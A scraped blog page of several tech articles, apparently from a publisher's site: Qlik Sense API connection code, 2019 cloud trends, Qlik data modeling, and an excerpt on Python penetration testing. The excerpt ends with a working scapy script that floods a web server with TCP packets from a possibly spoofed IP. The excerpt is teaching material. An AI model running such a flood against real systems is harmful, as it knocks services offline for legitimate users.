QS</h1> </body> <script> var certPath = path.join('C:', 'ProgramData', 'Qlik', 'Sense', 'Repository', 'Exported Certificates', '.Local Certificates'); var certificates = { cert: fs.readFileSync(path.resolve(certPath, 'client.pem')), key: fs.readFileSync(path.resolve(certPath, 'client_key.pem')), root: fs.readFileSync(path.resolve(certPath, 'root.pem')) }; // Open a WebSocket using the engine port (rather than going through the proxy) var ws = new WebSocket('wss://server.domain.com:4747/app/', { ca: certificates.root, cert: certificates.cert, key: certificates.key, headers: { 'X-Qlik-User': 'UserDirectory=internal; UserId=sa_engine' } }); ws.onopen = function (event) { // Call your methods } </script> Creating a connection using the Mashup API Now, while connecting to the engine is a fundamental step to start interacting with Qlik, it's very low-level, connecting via WebSockets. For advanced use cases, the Mashup API is one way to help you get up to speed with a more developer-friendly abstraction layer. The Mashup API utilizes the qlik interface as an external interface to Qlik Sense, used for mashups and for including Qlik Sense objects in external web pages. To load the qlik module, you first need to ensure RequireJS is available in your main project file. You will then have to specify the URL of your Qlik Sense environment, as well as the prefix of the virtual proxy, if there is one: <html> <body> <h1>Mastering QS</h1> </body> </html> <script src="https://cdnjs.cloudflare.com/ajax/libs/require.js/2.3.5/require.min.js"> <script> //Prefix is used for when a virtual proxy is used with the browser. var prefix = window.location.pathname.substr( 0, window.location.pathname.toLowerCase().lastIndexOf( "/extensions" ) + 1 ); //Config for retrieving the qlik.js module from the Qlik Sense Server var config = { host: window.location.hostname, prefix: prefix, port: window.location.port, isSecure: window.location.protocol === "https:" }; require.config({ baseUrl: (config.isSecure ? "https://" : "http://" ) + config.host + (config.port ? ":" + config.port : "" ) + config.prefix + "resources" }); require(["js/qlik"], function (qlik) { qlik.setOnError( function (error) { console.log(error); }); //Open an App var app = qlik.openApp('MasteringQlikSense.qvf', config); </script> Once you have created the connection to an app, you can start leveraging the full API by conveniently creating HyperCubes, connecting to fields, passing selections, retrieving objects, and much more. The Mashup API is intended for browser-based projects where authentication is handled in the same way as if you were going to open Qlik Sense. If you wish to use the Mashup API, or some parts of it, with a backend solution, you need to take care of authentication first. Creating a connection using enigma.js Enigma is Qlik's open-source promise wrapper for the engine. You can use enigma directly when you're in the Mashup API, or you can load it as a separate module. When you are writing code from within the Mashup API, you can retrieve the correct schema directly from the list of available modules which are loaded together with qlik.js via 'autogenerated/qix/engine-api'.   The following example will connect to a Demo App using enigma.js: define(function () { return function () { require(['qlik','enigma','autogenerated/qix/engine-api'], function (qlik, enigma, schema) { //The base config with all details filled in var config = { schema: schema, appId: "My Demo App.qvf", session:{ host:"localhost", port: 4848, prefix: "", unsecure: true, }, } //Now that we have a config, use that to connect to the //QIX service. enigma.getService("qix" , config).then(function(qlik){ qlik.global.openApp(config.appId) //Open App qlik.global.openApp(config.appId).then(function(app){ //Create SessionObject for FieldList app.createSessionObject( { qFieldListDef: { qShowSystem: false, qShowHidden: false, qShowSrcTables: true, qShowSemantic: true, qShowDerivedFields: true }, qInfo: { qId: "FieldList", qType: "FieldList" } } ).then( function(list) { return list.getLayout(); } ).then( function(listLayout) { return listLayout.qFieldList.qItems; } ).then( function(fieldItems) { console.log(fieldItems) } ); }) } })}}) It's essential to also load the correct schema whenever you load enigma.js. The schema is a collection of the available API methods that can be utilized in each version of Qlik Sense. This means your schema needs to be in sync with your QS version. Thus, we see it is fairly easy to create a stable connection with the Qlik Engine API. If you liked the above excerpt, make sure you check out the book Mastering Qlik Sense to learn more tips and tricks on working with different kinds of data using Qlik Sense and extract useful business insights. How Qlik Sense is driving self-service Business Intelligence Overview of a Qlik Sense® Application’s Life Cycle What we learned from Qlik Qonnections 2018
Read more
  • 0
  • 0
  • 14640
article-image-cloud-computing-trends-in-2019
Guest Contributor
07 Jan 2019
8 min read
Save for later

Cloud computing trends in 2019

Guest Contributor
07 Jan 2019
8 min read
Cloud computing is a rapidly growing technology that many organizations are adopting to enable their digital transformation. As per the latest Gartner report, the cloud tech services market is projected to grow 17.3% ($206 billion) in 2019, up from $175.8 billion in 2018 and by 2022, 90% of organizations will be using cloud services. In today’s world, Cloud technology is a trending buzzword among business environments. It provides exciting new opportunities for businesses to compete on a global scale and is redefining the way we do business. It enables a user to store and share data like applications, files, and more to remote locations. These features have been realized by all business owners, from startup to well-established organizations, and they have already started using cloud computing. How Cloud technology helps businesses Reduced Cost One of the most obvious advantages small businesses can get by shifting to the cloud is saving money. It can provide small business with services at affordable and scalable prices. Virtualization expands the value of physical equipment, which means companies can achieve more with less. Therefore, an organization can see a significant decline in power consumption, rack space, IT requirements, and more. As a result, there is lower maintenance, installation, hardware, support & upgrade costs. For small businesses, particularly, those savings are essential. Enhanced Flexibility Cloud can access data and related files from any location and from any device at any time with an internet connection. As the working process is changing to flexible and remote working, it is essential to provide work-related data access to employees, even when they are not at a workplace. Cloud computing not only helps employees to work outside of the office premises but also allows employers to manage their business as and when required. Also, enhanced flexibility & mobility in cloud technology can lead to additional cost savings. For example, an employer can select to execute BYOD (bring your own device). Therefore, employees can bring and work on their own devices which they are comfortable in.. Secured Data Improved data security is another asset of cloud computing. With traditional data storage systems, the data can be easily stolen or damaged. There can also be more chances for serious cyber attacks like viruses, malware, and hacking. Human errors and power outages can also affect data security. However, if you use cloud computing, you will get the advantages of improved data security. In the cloud, the data is protected in various ways such as anti-virus, encryption methods, and many more. Additionally, to reduce the chance of data loss, the cloud services help you to remain in compliance with HIPAA, PCI, and other regulations. Effective Collaboration Effective collaboration is possible through the cloud which helps small businesses to track and oversee workflow and progress for effective results. There are many cloud collaboration tools available in the market such as Google Drive, Salesforce, Basecamp, Hive, etc. These tools allow users to create, edit, save and share documents for workplace collaboration. A user can also constrain the access of these materials. Greater Integration Cloud-based business solutions can create various simplified integration opportunities with numerous cloud-based providers. They can also get benefits of specialized services that integrate with back-office operations such as HR, accounting, and marketing. This type of integration makes business owners concentrate on the core areas of a business. Scalability One of the great aspects of cloud-based services is their scalability. Currently, a small business may require limited storage, mobility, and more. But in future, needs & requirements will increase significantly in parallel with the growth of the business.  Considering that growth does not always occur linearly, cloud-based solutions can accommodate all sudden and increased requirements of the organization. Cloud-based services have the flexibility to scale up or to scale down. This feature ensures that all your requirements are served according to your budget plans. Cloud Computing Trends in 2019 Hybrid & Multi-Cloud Solutions Hybrid Cloud will become the dominant business model in the future. For organizations, the public cloud cannot be a good fit for all type of solutions and shifting everything to the cloud can be a difficult task as they have certain requirements. The Hybrid Cloud model offers a transition solution that blends the current on-premises infrastructure with open cloud & private cloud services. Thus, organizations will be able to shift to the cloud technology at their own pace while being effective and flexible. Multi-Cloud is the next step in the cloud evolution. It enables users to control and run an application, workload, or data on any cloud (private, public and hybrid) based on their technical requirements. Thus, a company can have multiple public and private clouds or multiple hybrid clouds, all either connected together or not. We can expect multi-cloud strategies to dominate in the coming days. Backup and Disaster Recovery According to Spiceworks report,  15% of the cloud budget is allocated to Backup and Disaster Recovery (DR) solutions, which is the highest budget allocation, followed by email hosting and productivity tools. This huge percentage impacts the shared responsibility model that public cloud providers operate on. Public cloud providers, like as AWS (Amazon Web Services ), Microsoft Azure, Google Cloud are responsible for the availability of Backup and DR solutions and security of the infrastructure, while the users are in charge for their data protection and compliance. Serverless Computing Serverless Computing is gaining more popularity and will continue to do so in 2019. It is a procedure utilized by Cloud users, who request a container PaaS (Platform as a Service), and Cloud supplier charges for the PaaS as required. The customer does not need to buy or rent services before and doesn't need to configure them. The Cloud is responsible for providing the platform, it’s configuration, and a wide range of helpful tools for designing applications, and working with data. Data Containers The process of Data Container usage will become easier in 2019. Containers are more popular for transferring data, they store and organize virtual objects, and resolve the issues of having software run reliably while transferring the data from one system to another. However, there are some confinements. While containers are used to transport, they can only be used with servers having compatible operating system “kernels.” Artificial Intelligence Platforms The utilization of AI to process Big Data is one of the more important upgrades in collecting business intelligence data and giving a superior comprehension of how business functions. AI platform supports a faster, more effective, and more efficient approach to work together with data scientists and other team members. It can help to reduce costs in a variety of ways, such as making simple tasks automated, preventing the duplication of effort, and taking over some expensive labor tasks, such as copying or extraction of data. Edge computing Edge computing is a systematic approach to execute data processing at the edge of the network to streamline cloud computing. It is a result of ever increased use of IoT devices. Edge is essential to run real-time services as it streamlines the flow of traffic from IoT devices and provides real-time data analytics and analysis. Hence, it is also on the rise in 2019. Service mesh Service mesh is a dedicated system layer to enhance service to service communication across microservices applications. It's a new and emerging class of service management for the inter-microservice communication complexity and provides observability and tracing in a seamless way. As containers become more prevalent for cloud-based application development, the requirement for service mesh is increasing significantly. Service meshes can help oversee traffic through service discovery, load balancing, routing, and observability. Service meshes attempt to diminish the complexity of containers and improve network functionality. Cloud Security As we see the rise in technology, security is obviously another serious consideration. With the introduction of the GDPR (General Data Protection Regulation) security concerns have risen much higher and are the essential thing to look after. Many businesses are shifting to cloud computing without any serious consideration of its security compliance protocols. Therefore, GDPR will be an important thing in 2019 and the organization must ensure that their data practices are both safe and compliant. Conclusion As we discussed above, cloud technology is capable of providing better data storage, data security, collaboration, and it also changes the workflow to help small business owners to take better decisions. Finally, cloud connectivity is all about convenience, and streamlining workflow to help any business become more flexible, efficient, productive, and successful. If you want to set your business up for success, this might be the time to transition to cloud-based services. Author Bio Amarendra Babu L loves pursuing excellence through writing and has a passion for technology. He is presently working as a content contributor for Mindmajix.com and Tekslate.com. He is a tech-geek and love to explore new opportunities. His work has been published on various sites related to Big Data, Business Analytics & Intelligence, Blockchain, Cloud Computing, Data Science, AI & ML, Project Management, and more. You can reach him at [email protected]. He is also available on Linkedin. 8 programming languages to learn in 2019 18 people in tech every programmer and software engineer need to follow in 2019 We discuss the key trends for web and app developers in 2019 [Podcast]
Read more
  • 0
  • 0
  • 14639

article-image-implementing-data-modeling-techniques-in-qlik-sense-tutorial
Bhagyashree R
17 Jul 2019
14 min read
Save for later

Implementing Data Modeling techniques in Qlik Sense [Tutorial]

Bhagyashree R
17 Jul 2019
14 min read
Data modeling is a conceptual process, representing the associations between the data in a manner in which it caters to specific business requirements. In this process, the various data tables are linked as per the business rules to achieve business needs. This article is taken from the book Hands-On Business Intelligence with Qlik Sense by Kaushik Solanki, Pablo Labbe, Clever Anjos, and Jerry DiMaso. By the end of this book, you will be well-equipped to run successful business intelligence applications using Qlik Sense's functionality, data modeling techniques, and visualization best practices. To follow along with the examples implemented in this article, you can download the code from the book’s GitHub repository. In this article, we will look at the basic concept of data modeling, its various types, and learn which technique is best suited for Qlik Sense dashboards. We will also learn about the methods for linking data with each other using joins and concatenation. Technical requirements For this article, we will use the app created earlier in the book, as a starting point with a loaded data model. You can find it in the book's GitHub repository. You can also download the initial and final version of the application from the repository. After downloading the initial version of the application, perform the following steps: If you are using Qlik Sense Desktop, place the app in the Qlik\Sense\Apps folder under your Documents personal folder If you are using Qlik Sense Cloud, upload the app to your personal workspace Advantages of data modeling Data modeling helps business in many ways. Let's look at some of the advantages of data modeling: High-speed retrieval: Data modeling helps to get the required information much faster than expected. This is because the data is interlinked between the different tables using the relationship. Provides ease of accessing data: Data modeling eases the process of giving the right access to the data to the end-users. With the simple data query language, you can get the required data easily. Helps in handling multiple relations: Various datasets have various kinds of relationship between the other data. For example, there could be one-to-one, or one-to-many, or many-to-many relationships. Data modeling helps in handling this kind of relationship easily. Stability: Data modeling provides stability to the system. Data modeling techniques There are various techniques in which data models can be built, each technique has its own advantages and disadvantages. The following are two widely-used data modeling techniques. Entity-relationship modeling The entity-relationship modeling (ER modeling) technique uses the entity and relationships to create a logical data model.  This technique is best suited for the Online Transaction Processing (OLTP) systems. An entity in this model refers to anything or object in the real world that has distinguishable characteristics. While a relationship in this model is the relationship between the two or more entities. There are three basic types of relationship that can exist: One-to-one: This relation means each value from one entity has a single relation with a value from the other entity. For example, one customer is handled by one sales representative: One-to-many: This relation means each value from one entity has multiple relations with values from other entities. For example, one sales representative handles multiple customers: Many-to-many: This relation means all values from both entities have multiple relations with each other. For example, one book can have many authors and each author can have multiple books: Dimensional modeling The dimensional modeling technique uses facts and dimensions to build the data model. This modeling technique was developed by Ralf Kimball. Unlike ER modeling, which uses normalization to build the model, this technique uses the denormalization of data to build the model. Facts, in this context, are tables that store the most granular transactional details. They mainly store the performance measurement metrics, which are the outcome of the business process. Fact tables are huge in size, because they store the transactional records. For example, let's say that sales data is captured at a retail store. The fact table for such data would look like the following: A fact table has the following characteristics: It contains the measures, which are mostly numeric in nature It stores the foreign key, which refers to the dimension tables It stores large numbers of records Mostly, it does not contain descriptive data The dimension table stores the descriptive data, describing the who, what, which, when, how, where, and why associated with the transaction. It has the maximum number of columns, but the records are generally fewer than fact tables. Dimension tables are also referred to as companions of the fact table. They store textual, and sometimes numerical, values. For example, a PIN code is numeric in nature, but they are not the measures and thus they get stored in the dimension table. In the previous sales example that we discussed, the customer, product, time, and salesperson are the dimension tables. The following diagram shows a sample dimension table: The following are the characteristics of the dimension table: It stores descriptive data, which describes the attributes of the transaction It contains many columns and fewer records compared to the fact table It also contains numeric data, which is descriptive in nature There are two types of dimensional modeling techniques that are widely used: Star schema: This schema model has one fact table that is linked with multiple dimension tables. The name star is given because once the model is ready, it looks like a star. The advantages of the star schema model include the following: Better query performance Simple to understand The following diagram shows an example of the star schema model: Snowflake schema: This schema model is similar to the star schema, but in this model, the dimensional tables are normalized further. The advantages of the snowflake schema model include the following: It provides better referential integrity It requires less space as data is normalized The following diagram shows an example of the snowflake schema model: When it comes to data modeling in Qlik Sense, the best option is to use the star schema model for better performance. Qlik Sense works very well when the data is loaded in a denormalized form, thus the star schema is suitable for Qlik Sense development. The following diagram shows the performance impact of different data models on Qlik Sense: Now that we know what data modeling is and which technique is most appropriate for Qlik Sense data modeling, let's look at some other fundamentals of handling data. Joining While working on data model building, we often encounter a situation where we want to have some fields added from one table into another to do some sort of calculations. In such situations, we use the option of joining those tables based on the common fields between them. Let's understand how we can use joins between tables with a simple example. Assume you want to calculate the selling price of a product. The information you have is SalesQty in Sales Table and UnitPrice of product in Product Table. The calculation for getting the sales price is UnitPrice * SalesQty. Now, let's see what output we get when we apply a join on these tables: Types of joins There are various kinds of joins available but let's take a look at the various types of joins supported by Qlik Sense. Let's consider the following tables to understand each type better: Order table: This table stores the order-related data: OrderNumber Product CustomerID OrderValue 100 Fruits 1 100 101 Fruits 2 80 102 Fruits 3 120 103 Vegetables 6 200 Customer table: This table stores the customer details, which include the CustomerID and Name: CustomerID Name 1 Alex 2 Linda 3 Sam 4 Michael 5 Sara Join/outer join When you want to get the data from both the tables you use the Join keyword. When you just use only Join between two tables, it is always a full outer join. The Outer keyword is optional. The following diagram shows the Venn diagram for the outer join: Now, let's see how we script this joining condition in Qlik Sense: Create a new Qlik Sense application. Give it a name of your choice. Jump to Script editor, create a new tab, and rename it as Outer Join, as shown in the following screenshot. Write the script shown in the following screenshot: Once you write the script, click on Load Data to run the script and load the data. Once the data is loaded, create a new sheet and add the Table object to see the joined table data, as shown in the following screenshot: As the output of Outer Join, we got five fields, as shown in the preceding screenshot. You can also observe that the last two rows have null values for the fields, which come from the Order table, where the customers 4 and 5 are not present. Left join When you want to extract all the records from the left table and matching records from the right table, then you use the Left Join keyword to join those two tables. The following diagram shows the Venn diagram for left join: Let's see the script for left join: In the previous application created, delete the Outer Join tab. Create a new tab and rename it as Left Join, as shown in the following screenshot. Write the script shown in the following screenshot: Once the script is written, click on Load Data to run the script and load the data. Once the script is finished, create a new sheet and add the Table object to see the joined table data, as shown in the following screenshot: Right join When you want to extract all the records from the right table and the matching records from the left table, then you use the right join keyword to join those two tables. The following diagram shows the Venn diagram for right join: Let's see the script for right join: In the previous application created, comment the existing script. Create a new tab and rename it as Right Join, as shown in the following screenshot. Write the script, as shown in the following screenshot: Once the script is written, click on Load Data to run the script and load the data. Once the script is finished, create a new sheet and add the Table object to see the joined table data, as shown in the following screenshot: Inner join When you want to extract matching records from both the tables, you use the Inner Join keyword to join those two tables. The following diagram shows the Venn diagram for inner join: Let's see the script for inner join: In the previous application created, comment the existing script. Create a new tab and rename it as Inner Join, as shown in the following screenshot. Write the script shown in following screenshot: Once the script is written, click on Load Data to run the script and load the data. Once the script is finished, create a new sheet and add the Table object to see the joined table data, as shown in the following screenshot: Concatenation Sometimes you come across a situation while building the data model where you may have to append one table below another. In such situations, you can use the concatenate function. Concatenating, as the name suggests, helps to add the records of one table below another. Concatenate is different from joins. Unlike joins, concatenate does not merge the matching records of both the tables in a single row. Automatic concatenation When the number of columns and their naming is same in two tables, Qlik Sense, by default, concatenates those tables without any explicit command. This is called the automatic concatenation. For example, you may get the customer information from two different sources, but with the same columns names. In such a case, automatic concatenation will be done by Qlik, as is shown in the following screenshot: You can see in the preceding screenshot that both the Source1 and Source2 tables have two columns with same names (note that names in Qlik Sense are case-sensitive). Thus, they are auto concatenated. One more thing to note here is that, in such a situation, Qlik Sense ignores the name given to the second table and stores all the data under the name given to the first table. The output table after concatenation is shown in the following screenshot: Forced concatenation There will be some cases in which you would like to concatenate two tables irrespective of the number of columns and name. In such a case, you should use the keyword Concatenate between two Load statements to concatenate those two tables. This is called the forced concatenation. For example, if you have sales and budget data at similar granularity, then you should use the Concatenate keyword to forcefully concatenate both tables, as shown in the following screenshot: The output table after loading this script will have data for common columns, one below the other. For the columns that are not same, there will be null values in those columns for the table in which they didn't exist. This is shown in the following output: You can see in the preceding screenshot that the SalesAmount is null for the budget data, and Budget is null for the sales data. The NoConcatenate In some situations when even though the columns and their name from the two tables are the same, you may want to treat them differently and don’t want to concatenate them. So Qlik Sense provides the NoConcatenate keyword, which helps to prevent automatic concatenation. Let's see how to write the script for NoConcatenate: You should handle the tables properly; otherwise, the output of NoConcatenate may create a synthetic table. Filtering In this section, we will learn how to filter the data while loading in Qlik Sense. As you know, there are two ways in which we can load the data in Qlik Sense: either by using the Data manager or the script editor. Let's see how to filter data with each of these options. Filtering data using the Data manager When you load data using the Data manager, you get an option named Filters at the top-right corner of the window, as shown in the following screenshot: This filter option enables us to set the filtering condition, which loads only the data that satisfies the condition given. The filter option allows the following conditions: = >  >= <  <= Using the preceding conditions, you can filter the text or numeric values of a field. For example, you can set a condition such as Date >= '01/01/2012' or ProductID = 80. The following screenshot shows such conditions applied in the Data load editor: Filtering data in the script editor If you are familiar with the Load statement or the SQL Select statement, it will be easy for you to filter the data while loading it. In the script editor, the best way to restrict the data is to include the Where clause at the end of the Load or Select statement; for example, Where Date >= '01/01/2012'. When you use the Where clause with the Load statement, you can use the following conditions: = > >= <  <= When you write the Where clause with the SQL Select statement, you can use the following conditions: = >  >= <  <= In Between Like Is Null Is Not Null The following screenshot shows an example of both the statements: This article walked you through various data modeling techniques. We also saw different types of joins and how we can implement them in Qlik Sense.  Then, we learned about concatenation and the scenarios in which we should use the concatenation option. We also looked at automatic concatenation, forced concatenation, and NoConcatenation. Further, we learned about the ways in which data can be filtered while loading in Qlik Sense. If you found this post useful, do check out the book, Hands-On Business Intelligence with Qlik Sense. This book teaches you how to create dynamic dashboards to bring interactive data visualization to your enterprise using Qlik Sense. 5 ways to create a connection to the Qlik Engine [Tip] What we learned from Qlik Qonnections 2018 Why AWS is the preferred cloud platform for developers working with big data
Read more
  • 0
  • 0
  • 14628

article-image-pentesting-using-python
Packt
04 Feb 2015
22 min read
Save for later

Pentesting Using Python

Packt
04 Feb 2015
22 min read
 In this article by the author, Mohit, of the book, Python Penetration Testing Essentials, Penetration (pen) tester and hacker are similar terms. The difference is that penetration testers work for an organization to prevent hacking attempts, while hackers hack for any purpose such as fame, selling vulnerability for money, or to exploit vulnerability for personal enmity. Lots of well-trained hackers have got jobs in the information security field by hacking into a system and then informing the victim of the security bug(s) so that they might be fixed. A hacker is called a penetration tester when they work for an organization or company to secure its system. A pentester performs hacking attempts to break the network after getting legal approval from the client and then presents a report of their findings. To become an expert in pentesting, a person should have deep knowledge of the concepts of their technology.  (For more resources related to this topic, see here.) Introducing the scope of pentesting In simple words, penetration testing is to test the information security measures of a company. Information security measures entail a company's network, database, website, public-facing servers, security policies, and everything else specified by the client. At the end of the day, a pentester must present a detailed report of their findings such as weakness, vulnerability in the company's infrastructure, and the risk level of particular vulnerability, and provide solutions if possible. The need for pentesting There are several points that describe the significance of pentesting: Pentesting identifies the threats that might expose the confidentiality of an organization Expert pentesting provides assurance to the organization with a complete and detailed assessment of organizational security Pentesting assesses the network's efficiency by producing huge amount of traffic and scrutinizes the security of devices such as firewalls, routers, and switches Changing or upgrading the existing infrastructure of software, hardware, or network design might lead to vulnerabilities that can be detected by pentesting In today's world, potential threats are increasing significantly; pentesting is a proactive exercise to minimize the chance of being exploited Pentesting ensures whether suitable security policies are being followed or not Consider an example of a well-reputed e-commerce company that makes money from online business. A hacker or group of black hat hackers find a vulnerability in the company's website and hack it. The amount of loss the company will have to bear will be tremendous. Components to be tested An organization should conduct a risk assessment operation before pentesting; this will help identify the main threats such as misconfiguration or vulnerability in: Routers, switches, or gateways Public-facing systems; websites, DMZ, e-mail servers, and remote systems DNS, firewalls, proxy servers, FTP, and web servers Testing should be performed on all hardware and software components of a network security system. Qualities of a good pentester The following points describe the qualities of good pentester. They should: Choose a suitable set of tests and tools that balance cost and benefits Follow suitable procedures with proper planning and documentation Establish the scope for each penetration test, such as objectives, limitations, and the justification of procedures Be ready to show how to exploit the vulnerabilities State the potential risks and findings clearly in the final report and provide methods to mitigate the risk if possible Keep themselves updated at all times because technology is advancing rapidly A pentester tests the network using manual techniques or the relevant tools. There are lots of tools available in the market. Some of them are open source and some of them are highly expensive. With the help of programming, a programmer can make his own tools. By creating your own tools, you can clear your concepts and also perform more R&D. If you are interested in pentesting and want to make your own tools, then the Python programming language is the best, as extensive and freely available pentesting packages are available in Python, in addition to its ease of programming. This simplicity, along with the third-party libraries such as scapy and mechanize, reduces code size. In Python, to make a program, you don't need to define big classes such as Java. It's more productive to write code in Python than in C, and high-level libraries are easily available for virtually any imaginable task. If you know some programming in Python and are interested in pentesting this book is ideal for you. Defining the scope of pentesting Before we get into pentesting, the scope of pentesting should be defined. The following points should be taken into account while defining the scope: You should develop the scope of the project in consultation with the client. For example, if Bob (the client) wants to test the entire network infrastructure of the organization, then pentester Alice would define the scope of pentesting by taking this network into account. Alice will consult Bob on whether any sensitive or restricted areas should be included or not. You should take into account time, people, and money. You should profile the test boundaries on the basis of an agreement signed by the pentester and the client. Changes in business practice might affect the scope. For example, the addition of a subnet, new system component installations, the addition or modification of a web server, and so on, might change the scope of pentesting. The scope of pentesting is defined in two types of tests: A non-destructive test: This test is limited to finding and carrying out the tests without any potential risks. It performs the following actions: Scans and identifies the remote system for potential vulnerabilities Investigates and verifies the findings Maps the vulnerabilities with proper exploits Exploits the remote system with proper care to avoid disruption Provides a proof of concept Does not attempt a Denial-of-Service (DoS) attack A destructive test: This test can produce risks. It performs the following actions: Attempts DoS and buffer overflow attacks, which have the potential to bring down the system Approaches to pentesting There are three types of approaches to pentesting: Black-box pentesting follows non-deterministic approach of testing You will be given just a company name It is like hacking with the knowledge of an outside attacker There is no need of any prior knowledge of the system It is time consuming White-box pentesting follows deterministic approach of testing You will be given complete knowledge of the infrastructure that needs to be tested This is like working as a malicious employee who has ample knowledge of the company's infrastructure You will be provided information on the company's infrastructure, network type, company's policies, do's and don'ts, the IP address, and the IPS/IDS firewall Gray-box pentesting follows hybrid approach of black and white box testing The tester usually has limited information on the target network/system that is provided by the client to lower costs and decrease trial and error on the part of the pentester It performs the security assessment and testing internally Introducing Python scripting Before you start reading this book, you should know the basics of Python programming, such as the basic syntax, variable type, data type tuple, list dictionary, functions, strings, methods, and so on. Two versions, 3.4 and 2.7.8, are available at python.org/downloads/. In this book, all experiments and demonstration have been done in Python 2.7.8 Version. If you use Linux OS such as Kali or BackTrack, then there will be no issue, because many programs, such as wireless sniffing, do not work on the Windows platform. Kali Linux also uses the 2.7 Version. If you love to work on Red Hat or CentOS, then this version is suitable for you. Most of the hackers choose this profession because they don't want to do programming. They want to use tools. However, without programming, a hacker cannot enhance his2 skills. Every time, they have to search the tools over the Internet. Believe me, after seeing its simplicity, you will love this language. Understanding the tests and tools you'll need To conduct scanning and sniffing pentesting, you will need a small network of attached devices. If you don't have a lab, you can make virtual machines in your computer. For wireless traffic analysis, you should have a wireless network. To conduct a web attack, you will need an Apache server running on the Linux platform. It will be a good idea to use CentOS or Red Hat Version 5 or 6 for the web server because this contains the RPM of Apache and PHP. For the Python script, we will use the Wireshark tool, which is open source and can be run on Windows as well as Linux platforms. Learning the common testing platforms with Python You will now perform pentesting; I hope you are well acquainted with networking fundamentals such as IP addresses, classful subnetting, classless subnetting, the meaning of ports, network addresses, and broadcast addresses. A pentester must be perfect in networking fundamentals as well as at least in one operating system; if you are thinking of using Linux, then you are on the right track. In this book, we will execute our programs on Windows as well as Linux. In this book, Windows, CentOS, and Kali Linux will be used. A hacker always loves to work on a Linux system. As it is free and open source, Kali Linux marks the rebirth of BackTrack and is like an arsenal of hacking tools. Kali Linux NetHunter is the first open source Android penetration testing platform for Nexus devices. However, some tools work on both Linux and Windows, but on Windows, you have to install those tools. I expect you to have knowledge of Linux. Now, it's time to work with networking on Python. Implementing a network sniffer by using Python Before learning about the implementation of a network sniffer, let's learn about a particular struct method: struct.pack(fmt, v1, v2, ...): This method returns a string that contains the values v1, v2, and so on, packed according to the given format struct.unpack(fmt, string): This method unpacks the string according to the given format Let's discuss the code: import struct ms= struct.pack('hhl', 1, 2, 3) print (ms) k= struct.unpack('hhl',ms) print k The output for the preceding code is as follows: G:PythonNetworkingnetwork>python str1.py ☺ ☻ ♥ (1, 2, 3) First, import the struct module, and then pack the integers 1, 2, and 3 in the hhl format. The packed values are like machine code. Values are unpacked using the same hhl format; here, h means a short integer and l means a long integer. More details are provided in the subsequent sections. Consider the situation of the client server model; let's illustrate it by means of an example. Run the struct1.py. file. The server-side code is as follows: import socket import struct host = "192.168.0.1" port = 12347 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, port)) s.listen(1) conn, addr = s.accept() print "connected by", addr msz= struct.pack('hhl', 1, 2, 3) conn.send(msz) conn.close() The entire code is the same as we have seen previously, with msz= struct.pack('hhl', 1, 2, 3) packing the message and conn.send(msz) sending the message. Run the unstruc.py file. The client-side code is as follows: import socket import struct s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = "192.168.0.1" port =12347 s.connect((host,port)) msg= s.recv(1024) print msg print struct.unpack('hhl',msg) s.close() The client-side code accepts the message and unpacks it in the given format. The output for the client-side code is as follows: C:network>python unstruc.py ☺ ☻ ♥ (1, 2, 3) The output for the server-side code is as follows: G:PythonNetworkingprogram>python struct1.py connected by ('192.168.0.11', 1417) Now, you must have a fair idea of how to pack and unpack the data. Format characters We have seen the format in the pack and unpack methods. In the following table, we have C Type and Python type columns. It denotes the conversion between C and Python types. The Standard size column refers to the size of the packed value in bytes. Format C Type Python type Standard size x pad byte no value   c char string of length 1 1 b signed char integer 1 B unsigned char integer 1 ? _Bool bool 1 h short integer 2 H unsigned short integer 2 i int integer 4 I unsigned int integer 4 l long integer 4 L unsigned long integer 4 q long long integer 8 Q unsigned long long integer 8 f float float 4 d double float 8 s char[] string   p char[] string   P void * integer   Let's check what will happen when one value is packed in different formats: >>> import struct >>> struct.pack('b',2) 'x02' >>> struct.pack('B',2) 'x02' >>> struct.pack('h',2) 'x02x00' We packed the number 2 in three different formats. From the preceding table, we know that b and B are 1 byte each, which means that they are the same size. However, h is 2 bytes. Now, let's use the long int, which is 8 bytes: >>> struct.pack('q',2) 'x02x00x00x00x00x00x00x00' If we work on a network, ! should be used in the following format. The ! is used to avoid the confusion of whether network bytes are little-endian or big-endian. For more information on big-endian and little endian, you can refer to the Wikipedia page on Endianness: >>> struct.pack('!q',2) 'x00x00x00x00x00x00x00x02' >>>  You can see the difference when using ! in the format. Before proceeding to sniffing, you should be aware of the following definitions: PF_PACKET: It operates at the device driver layer. The pcap library for Linux uses PF_PACKET sockets. To run this, you must be logged in as a root. If you want to send and receive messages at the most basic level, below the Internet protocol layer, then you need to use PF_PACKET. Raw socket: It does not care about the network layer stack and provides a shortcut to send and receive packets directly to the application. The following socket methods are used for byte-order conversion: socket.ntohl(x): This is the network to host long. It converts a 32-bit positive integer from the network to host the byte order. socket.ntohs(x): This is the network to host short. It converts a 16-bit positive integer from the network to host the byte order. socket.htonl(x): This is the host to network long. It converts a 32-bit positive integer from the host to the network byte order. socket.htons(x): This is the host to network short. It converts a 16-bit positive integer from the host to the network byte order. So, what is the significance of the preceding four methods? Consider a 16-bit number 0000000000000011. When you send this number from one computer to another computer, its order might get changed. The receiving computer might receive it in another form, such as 1100000000000000. These methods convert from your native byte order to the network byte order and back again. Now, let's look at the code to implement a network sniffer, which will work on three layers of the TCP/IP, that is, the physical layer (Ethernet), the Network layer (IP), and the TCP layer (port). Introducing DoS and DDoS In this section, we are going to discuss one of the most deadly attacks, called the Denial-of-Service attack. The aim of this attack is to consume machine or network resources, making it unavailable for the intended users. Generally, attackers use this attack when every other attack fails. This attack can be done at the data link, network, or application layer. Usually, a web server is the target for hackers. In a DoS attack, the attacker sends a huge number of requests to the web server, aiming to consume network bandwidth and machine memory. In a Distributed Denial-of-Service (DDoS) attack, the attacker sends a huge number of requests from different IPs. In order to carry out DDoS, the attacker can use Trojans or IP spoofing. In this section, we will carry out various experiments to complete our reports. Single IP single port In this attack, we send a huge number of packets to the web server using a single IP (which might be spoofed) and from a single source port number. This is a very low-level DoS attack, and this will test the web server's request-handling capacity. The following is the code of sisp.py: from scapy.all import * src = raw_input("Enter the Source IP ") target = raw_input("Enter the Target IP ") srcport = int(raw_input("Enter the Source Port ")) i=1 while True: IP1 = IP(src=src, dst=target) TCP1 = TCP(sport=srcport, dport=80) pkt = IP1 / TCP1 send(pkt,inter= .001) print "packet sent ", i i=i+1 I have used scapy to write this code, and I hope that you are familiar with this. The preceding code asks for three things, the source IP address, the destination IP address, 